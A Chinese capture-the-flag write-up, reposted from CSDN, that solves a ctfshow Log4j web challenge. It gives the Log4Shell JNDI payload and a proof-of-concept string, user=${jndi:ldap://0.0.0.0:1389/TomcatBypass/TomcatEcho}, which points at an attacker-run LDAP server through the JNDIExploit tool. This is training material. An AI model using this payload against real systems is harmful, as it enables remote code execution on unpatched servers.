ctfshow—web—Log4j复现 23-10-06 09:21 4757 8211 blog.csdn.net 0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库 0x01 题目 0x02 Write Up 这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。 log4j的payload是:${jndi:ldap://} 这里选取的工具是:JNDIExploit 利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho} 这个poc可以进行回显显示: 获取到flag 0x03 other 欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。 以上 注:本文转载自blog.csdn.net的Wcbddd的文章"https://blog.csdn.net/HAI_WD/article/details/132655057"。版权归原作者所有,此博客不拥有其著作权,亦不承担相应法律责任。如有侵权,请联系我们删除。 复制链接
0x00 前言 CTF 加解密合集CTF Web合集网络安全知识库 0x01 题目 0x02 Write Up 这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。 log4j的payload是:${jndi:ldap://} 这里选取的工具是:JNDIExploit 利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho} 这个poc可以进行回显显示: 获取到flag 0x03 other 欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。 以上
评论记录:
回复评论: